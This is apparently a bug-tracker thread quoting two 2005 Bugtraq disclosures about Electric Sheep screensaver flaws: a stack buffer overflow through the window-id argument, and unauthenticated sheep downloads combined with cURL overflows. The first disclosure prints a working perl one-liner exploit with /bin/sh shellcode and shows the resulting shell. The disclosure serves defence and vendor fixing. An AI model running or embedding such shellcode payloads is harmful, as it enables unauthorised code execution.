From a bugtraq email authored by Michael Aiello http://www.michaelaiello.com Daniel Guido dguido@gmail.com ... Summary ======= Due to insufficient bounds checking, a lengthy window-id parameter can cause a stack based buffer overflow to occur allowing execution of arbitrary code with the privileges of the invoking user. This could potentially be used as a backdoor entry point. Background ========== "Electric Sheep is a free, open source screen saver run by thousands of people all over the world. It can be installed on any ordinary PC or Mac. When these computers "sleep", the screen saver comes on and the computers communicate with each other by the internet to share the work of creating morphing abstract animations known as "sheep". http://electricsheep.org/ Description =========== electricsheep.c 419: default_background(char *more) { char ob[MAXBUF]; char pbuf[MAXBUF]; char qbuf[MAXBUF]; if (nobg || (!on_root && !window_id)) return; if (more) sprintf(ob, "-merge -at 500,0 s.tif", splash_prefix, more); else ob[0] = 0; if (window_id) sprintf(qbuf, "-windowid %s", window_id); //no bounds checking on qbuf Because window_id comes directly from the command line, a malicious user has the potential to supply a window_id larger than MAXBUF and corrupt sorrounding memory. The vulnerability can be seen by executing the following command. electricsheep -window-id `perl -e '{print "A"x"40000";}'` Bad integer argument for the windowid option Usage: xsetbg [global options] {[image options] image_name ...} Type `xsetbg -help [option ...]' for information on a particular option, or `xsetbg -help' to enter the interactive help facility. subprocess failure: splash0, 256=1<<8+0 Segmentation fault An exploit spawing /bin/sh on SUSE Linux narain@(none):~/electricsheep-2.6.3> electricsheep -window-id `perl - e '{print "\x90"x"200"; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46 \x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb \x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; print "B"x"532";print "\x80\xc4\xfd\xbf"; print "C"x"39219";}'` Bad integer argument for the windowid option Usage: xsetbg [global options] {[image options] image_name ...} Type `xsetbg -help [option ...]' for information on a particular option, or `xsetbg -help' to enter the interactive help facility. subprocess failure: splash0, 256=1<<8+0 sh-3.00$ whoami narain sh-3.00$ Impact ====== This local exploit to the sheep client does not pose a significant threat as electricsheep does not setuid(0). However, local exploits may be used as mechanisms for subvert command execution once a system has been compromised or used to create backdoors. Workaround ========== The vendor was notified on November 18, 2005. The vendor was extremely responsive and cooperative in regards to these security issues. All issues are fixed in the CVS HEAD of Electric Sheep client development and will be included in the next release.
There's also another email by the same authors about a problem with a vulnerable cURL install, but it sounds bogus to me, because it's a cURL issue. Nevertheless here's the text: Summary ======== The lack of an authentication framework for downloaded sheep mpegs, as well as its dependence on and vulnerabilities in cURL allows an attacker to send and display arbitrary movie files in the Electric Sheep client and perform arbitrary local and remote code execution. Background ========== "Electric Sheep is a free, open source screen saver run by thousands of people all over the world. It can be installed on any ordinary PC or Mac. When these computers "sleep", the screen saver comes on and the computers communicate with each other by the internet to share the work of creating morphing abstract animations known as "sheep." http://electricsheep.org/ Description =========== By spoofing the DNS entry for sheepserver.net or otherwise redirecting the Electric Sheep client to a malicious sheep server, it is possible to force the Electric Sheep client to download and display arbitrary mpegs due to a lack of authentication of the sheep server and sheep mpegs. At minimum, a rogue sheep server would need to respond to the Electric Sheep client with list.gz, a list of sheep available for download, and the referenced mpegs. To properly display the mpegs, they need to contain special footer information which can be found at the bottom of any pre-existing Electric Sheep mpegs. Electric sheep uses cURL internally for interaction with the Electric Sheep server. Two recent vulnerabilities in cURL can be exploited through malicious interaction with the Electric Sheep client. As in the previous vulnerability, spoofing the DNS entry of sheepserver.net or otherwise redirecting the Electric Sheep client to a malicious sheep server and replacing it with an appropriate HTTP 30x response can allow remote code execution through cURL due to an NTLM buffer overflow vulnerability [1,2]. Calling the Electric Sheep client by command line, configuration file, or otherwise with a malicious sheep server URL allows local code execution through cURL due to a URL buffer overflow vulnerability. In addition, by redirecting the Electric Sheep client to a rogue sheep server and supplying a list of maliciously formatted URLs it is possible to exploit the same cURL URL buffer overflow vulnerability remotely. This is possible because the Electric Sheep client makes direct system calls to the vulnerable cURL application from network supplied input [3,4]. Impact ====== Spoofing the DNS entry for sheepserver.net or otherwise redirecting the Electric Sheep client to a rogue sheep server, it is possible to remotely control the video displayed or remotely execute code on all Electric Sheep clients affected by such a redirection. Local code execution is also possible due to a cURL vulnerability. Workaround ========== The vendor was notified on November 18, 2005. The vendor was extremely responsive and cooperative in regards to these security issues. All issues are fixed in the CVS HEAD of Electric Sheep client development and will be included in the next release. References ========== [ 1 ] libcurl NTLM Buffer Overflow Vulnerability http://curl.haxx.se/docs/adv_20051013.html [ 2 ] CVE-2005-3185 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3185 [ 3 ] libcurl URL Buffer Overflow Vulnerability http://curl.haxx.se/docs/adv_20051207.html [ 4 ] CVE-2005-4077 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4077
This bug does not look like a security issue, reassigning to maintainer...
*** Bug 116852 has been marked as a duplicate of this bug. ***
fixed in 2.6.4 Carsten thoughts and timeframe on makeing this stable?
Sorry, no idea Daniel. I'm not using electric sheep, just try to monitor bugtraq and full-disclosure and file bugs as I have time, so we hopefully don't miss a public vulnerability. In this case promptly rejected by our hard working security team, though.
k thanks. closing this and usual stable rules will apply.
